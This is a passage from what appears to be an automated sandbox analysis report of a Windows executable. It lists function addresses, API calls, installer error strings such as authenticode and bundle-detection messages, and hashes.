                                                                                                                                                                                                                                                                                                  • Failed while searching directory search: %ls, for path: %ls, xrefs: 00869C34
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                                                                                                                                                  • String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 1811509786-2966038646
                                                                                                                                                                                                                                                                                                  • Opcode ID: b3c2959dbbcdca93f344d95fce064db4bebb7325b10bbd6097bfac9c15fa0610
                                                                                                                                                                                                                                                                                                  • Instruction ID: cae9444dbac8ecad9d73844900022b63c8d82600dbc75e3bc5043bc39851dac2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3c2959dbbcdca93f344d95fce064db4bebb7325b10bbd6097bfac9c15fa0610
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98212333940125F7DB222A988D02B9EBBACFF11720F220611FD50F66E1D7755E50AACA
                                                                                                                                                                                                                                                                                                  Function 00869D4B Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00869D64
                                                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,?,0086A883,00000100,000002C0,000002C0,?,000002C0,00000100), ref: 00869D84
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086A883,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 00869D8F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to set variable to file search path., xrefs: 00869DE7
                                                                                                                                                                                                                                                                                                  • Failed to format variable string., xrefs: 00869D6F
                                                                                                                                                                                                                                                                                                  • Failed while searching file search: %ls, for path: %ls, xrefs: 00869DBD
                                                                                                                                                                                                                                                                                                  • File search: %ls, did not find path: %ls, xrefs: 00869DF3
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                                                                                                                                                  • String ID: Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 1811509786-3425311760
                                                                                                                                                                                                                                                                                                  • Opcode ID: 59ccce7653d413149922e1c317e48beb66b0fcc82ce0b3283c9aabc7d593781d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 06770ef575131ff6fcef802cdaf67c56dfbd5c60d3c99d59c3a0f55b9ec94cab
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59ccce7653d413149922e1c317e48beb66b0fcc82ce0b3283c9aabc7d593781d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C112B33840525F7EF126698CD02B5DBA29FF11720F220262FD50F75E1E7765E20A6D2
                                                                                                                                                                                                                                                                                                  Function 0087CF25 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 55synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,0087D365,00000000,?,?,0087C7C9,00000001,?,?,?,?,?), ref: 0087CF37
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0087D365,00000000,?,?,0087C7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0087CF41
                                                                                                                                                                                                                                                                                                  • GetExitCodeThread.KERNEL32(00000001,?,?,?,0087D365,00000000,?,?,0087C7C9,00000001,?,?,?,?,?,00000000), ref: 0087CF7D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0087D365,00000000,?,?,0087C7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0087CF87
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3686190907-1954264426
                                                                                                                                                                                                                                                                                                  • Opcode ID: 77df453e90b74ca7fce309b5d45560d5c53470a59a58ea1fa5f12af3e98e8f14
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3abf03566813a062887708f8d4264c02c13c3793b65a63f0fdae4856f228028c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77df453e90b74ca7fce309b5d45560d5c53470a59a58ea1fa5f12af3e98e8f14
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8014933A81A356397305B955C06A9F7A48FF05B61B028129FE18FB381EB94CC0086E5
                                                                                                                                                                                                                                                                                                  Function 008769AE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,00876EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 008769BB
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00876EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 008769C5
                                                                                                                                                                                                                                                                                                  • GetExitCodeThread.KERNEL32(00000001,00000000,?,00876EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 00876A04
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00876EED,crypt32.dll,?,00000000,?,00000000,00000001), ref: 00876A0E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3686190907-2546940223
                                                                                                                                                                                                                                                                                                  • Opcode ID: c9a6012755896e21035e7067b96b5f9fb1aaefaa80e171f29ee279e3af52b24d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4f3229c926a42c0804ffe160bb237027193d3859e4593e3da94724965b9d2618
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9a6012755896e21035e7067b96b5f9fb1aaefaa80e171f29ee279e3af52b24d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16116970744616BBEB109F659D02BBE7AA8FF00711F108165B914EA261FB35CE109755
                                                                                                                                                                                                                                                                                                  Function 0087F7D9 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 118COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0087F7EE
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0087F8FB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • UX requested unknown payload with id: %ls, xrefs: 0087F85A
                                                                                                                                                                                                                                                                                                  • UX requested unknown container with id: %ls, xrefs: 0087F8BA
                                                                                                                                                                                                                                                                                                  • UX denied while trying to set source on embedded payload: %ls, xrefs: 0087F870
                                                                                                                                                                                                                                                                                                  • Failed to set source path for payload., xrefs: 0087F88A
                                                                                                                                                                                                                                                                                                  • Failed to set source path for container., xrefs: 0087F8E0
                                                                                                                                                                                                                                                                                                  • Engine is active, cannot change engine state., xrefs: 0087F808
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                  • String ID: Engine is active, cannot change engine state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-4121889706
                                                                                                                                                                                                                                                                                                  • Opcode ID: 20852d73e2f6767cfa50b704fd322e9340225976f247b39f7eb354bd627366af
                                                                                                                                                                                                                                                                                                  • Instruction ID: b90a6ae6a14d87047e437366a62057cf403520ac2a16d374d7743dd55a4bdc77
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20852d73e2f6767cfa50b704fd322e9340225976f247b39f7eb354bd627366af
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54310432A00615AF8B219B5ACC46EAA73ACFF15720B15C176F918EB342DB74ED008793
                                                                                                                                                                                                                                                                                                  Function 008671FD Relevance: 12.1, APIs: 1, Strings: 7, Instructions: 99stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(00000000), ref: 00867210
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to append escape sequence., xrefs: 008672A3
                                                                                                                                                                                                                                                                                                  • [\%c], xrefs: 0086726F
                                                                                                                                                                                                                                                                                                  • Failed to append characters., xrefs: 0086729C
                                                                                                                                                                                                                                                                                                  • Failed to allocate buffer for escaped string., xrefs: 00867227
                                                                                                                                                                                                                                                                                                  • Failed to copy string., xrefs: 008672C4
                                                                                                                                                                                                                                                                                                  • Failed to format escape sequence., xrefs: 008672AA
                                                                                                                                                                                                                                                                                                  • []{}, xrefs: 0086723A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen
                                                                                                                                                                                                                                                                                                  • String ID: Failed to allocate buffer for escaped string.$Failed to append characters.$Failed to append escape sequence.$Failed to copy string.$Failed to format escape sequence.$[\%c]$[]{}
                                                                                                                                                                                                                                                                                                  • API String ID: 1659193697-3250950999
                                                                                                                                                                                                                                                                                                  • Opcode ID: 315c4b781260cc00fb024260f2c7b37cd80d5c8033ae7192571c999b9a306908
                                                                                                                                                                                                                                                                                                  • Instruction ID: 71e087242f1849ae0af96887a4d3334e45a614455ef08109dc5042a0da453006
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 315c4b781260cc00fb024260f2c7b37cd80d5c8033ae7192571c999b9a306908
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4213732D08219BBEF229694DC56FAE77A9FF11728F220051F802F6341DFB59E4092D1
                                                                                                                                                                                                                                                                                                  Function 00885BDC Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 207COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,008AB500,000000FF,feclient.dll,000000FF,00000000,00000000,?,?,?,008867DE,?,00000001,?,008AB4A0), ref: 00885C45
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • feclient.dll, xrefs: 00885C3B, 00885D65
                                                                                                                                                                                                                                                                                                  • Failed to insert execute action., xrefs: 00885C9A
                                                                                                                                                                                                                                                                                                  • Failed to plan action for target product., xrefs: 00885CF0
                                                                                                                                                                                                                                                                                                  • Failed to copy target product code., xrefs: 00885D78
                                                                                                                                                                                                                                                                                                  • Failed grow array of ordered patches., xrefs: 00885CDE
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                                                                                                                                                  • String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.$feclient.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 1825529933-3477540455
                                                                                                                                                                                                                                                                                                  • Opcode ID: cda2881cc601d57f98e28203e30b206d7a11db4594cc2d3546319851330e7298
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2b9b53e77569c651e6b1489b4d6f0d4b3bc85e438a1d69cd128f11a82f9612ac
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cda2881cc601d57f98e28203e30b206d7a11db4594cc2d3546319851330e7298
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B8122B660074AEFCB14DF58C880AAA77A5FF08324B118669ED29CB352D770ED51CF90
                                                                                                                                                                                                                                                                                                  Function 0089CAED Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0089D262,00000000,00000000,00000000,00000000,00000000,00892F1D), ref: 0089CB2F
                                                                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 0089CBAA
                                                                                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 0089CBC5
                                                                                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0089CBEB
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000000,0089D262,00000000,?,?,?,?,?,?,?,?,?,0089D262,00000000), ref: 0089CC0A
                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,00000000,00000001,0089D262,00000000,?,?,?,?,?,?,?,?,?,0089D262,00000000), ref: 0089CC43
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: ec877f4191c2b8fac384a02506af9060e959183e11e06bb872f60fb68ce00386
                                                                                                                                                                                                                                                                                                  • Instruction ID: cff3ea3149d05e9349dd6f8700195c917e8fd76d4d13a8f0617ba1bb0afa9daf
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec877f4191c2b8fac384a02506af9060e959183e11e06bb872f60fb68ce00386
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D51D371A002499FDF10DFA8DC85AEEBBF8FF09314F18411AE955E7251E731A941CBA1
                                                                                                                                                                                                                                                                                                  Function 00889279 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 150COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000100,00000000,?,?,?,00877113,000000B8,0000001C,00000100), ref: 008892A4
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,008AB4B8,000000FF,?,?,?,00877113,000000B8,0000001C,00000100,00000100,00000100,000000B0), ref: 0088932E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • BA aborted detect forward compatible bundle., xrefs: 00889398
                                                                                                                                                                                                                                                                                                  • detect.cpp, xrefs: 0088938E
                                                                                                                                                                                                                                                                                                  • comres.dll, xrefs: 008893B0
                                                                                                                                                                                                                                                                                                  • Failed to initialize update bundle., xrefs: 008893D1
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                                                                                                                                                  • String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$comres.dll$detect.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1825529933-439563586
                                                                                                                                                                                                                                                                                                  • Opcode ID: 89a8d86fb00fc1715821996ebc5ead3c28af6eeb52a3c08fa88baab169233b58
                                                                                                                                                                                                                                                                                                  • Instruction ID: 288fa7fc2b35794fdf5b61701cabf88fc34d5cefa9c5337baf0856ea86828205
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89a8d86fb00fc1715821996ebc5ead3c28af6eeb52a3c08fa88baab169233b58
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C851B170600205BFDF15AF68CC81EBAB76AFF05310F584269F928DA295C772EC60DB91
                                                                                                                                                                                                                                                                                                  Function 0087AB9E Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 140COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00865479,000000FF,00AAC56B,E9008ABA,008653BD,00000000,?,E9008ABA,00000000), ref: 0087AC94
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,00865479,000000FF,00AAC56B,E9008ABA,008653BD,00000000,?,E9008ABA,00000000), ref: 0087ACD8
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • cache.cpp, xrefs: 0087AC6A, 0087ACB8, 0087ACFC
                                                                                                                                                                                                                                                                                                  • Failed authenticode verification of payload: %ls, xrefs: 0087AC75
                                                                                                                                                                                                                                                                                                  • Failed to verify expected payload against actual certificate chain., xrefs: 0087AD1E
                                                                                                                                                                                                                                                                                                  • Failed to get signer chain from authenticode certificate., xrefs: 0087AD06
                                                                                                                                                                                                                                                                                                  • Failed to get provider state from authenticode certificate., xrefs: 0087ACC2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$cache.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1452528299-2590768268
                                                                                                                                                                                                                                                                                                  • Opcode ID: a19459a981f9edcadea0361303a2e06bc8975c245b593fdbdb602e3867ed524d
                                                                                                                                                                                                                                                                                                  • Instruction ID: 48cbfd4be71515eb455387b461f5762e3d09c978eddd0ccaa7e3c142347c4c2a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a19459a981f9edcadea0361303a2e06bc8975c245b593fdbdb602e3867ed524d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B41C872D01629B7DB159B98CC46ADEBBB8FF48720F014129F914F7381E7759D008AE2
                                                                                                                                                                                                                                                                                                  Function 008A02F8 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 123COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 008A033C
                                                                                                                                                                                                                                                                                                  • GetComputerNameW.KERNEL32(?,?), ref: 008A0394
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • === Logging started: %ls ===, xrefs: 008A03BF
                                                                                                                                                                                                                                                                                                  • Executable: %ls v%d.%d.%d.%d, xrefs: 008A03F0
                                                                                                                                                                                                                                                                                                  • --- logging level: %hs ---, xrefs: 008A0454
                                                                                                                                                                                                                                                                                                  • Computer : %ls, xrefs: 008A0402
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
